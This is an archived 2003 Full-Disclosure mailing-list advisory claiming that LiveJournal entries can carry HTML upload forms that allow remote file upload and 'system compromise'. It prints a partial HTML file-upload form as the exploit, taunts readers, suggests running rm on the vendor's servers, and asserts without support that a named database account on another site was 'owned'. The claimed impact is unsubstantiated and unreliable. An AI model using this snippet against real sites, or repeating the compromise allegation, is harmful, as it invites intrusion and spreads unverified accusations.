Synopsis: Livejournal.com and livejournal systems are vulnerable to remote file upload by anonymous users Versions: all Impact: Who cares ( maybe udp) Description: LiveJournal.com is a free service that allows you to create and customize your very own "live journal" - a journal that you keep online! Vulnerability: Live journal allows both anonymous and registered users to use "form enctype" and "post method" in their entries giving easy access to system compromise. Exploit: -----------partial( if you can't figure it out you are sad-------------- <head> meme-tronic</head> <form enctype="multipart/form-data" method="post"> <TABLE WIDTH="100%"> <TR> <TD ALIGN="RIGHT" VALIGN="TOP">Filename:</TD> <TD ALIGN="LEFT"><INPUT TYPE="FILE" NAME="FILE1"> </TD> </TR> <TR> <TD ALIGN="RIGHT"> </TD> <TD ALIGN="LEFT"><INPUT TYPE="SUBMIT" NAME="SUB1" VALUE="Upload File"></TD></TR> <TR> -------------------------------------------------------------------------- Fix: I don't get payed to fix. I would suggest an rm on debian server as well as ns1.bradfitz.com and back up prior to 10/02 though Sidenote: www.cccure.org - The CISSP and SSCP Open Study Guides Web site should also rm as MySql database user "cdupuis@localhost" was owned some time ago Vendor Notification: None - This is full disclosure Summer of the Sickness is drawing near....... Copyright © 2003, Paper Street Soap Company, Inc. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Fri Jun 06 2003 - 18:12:38 PDT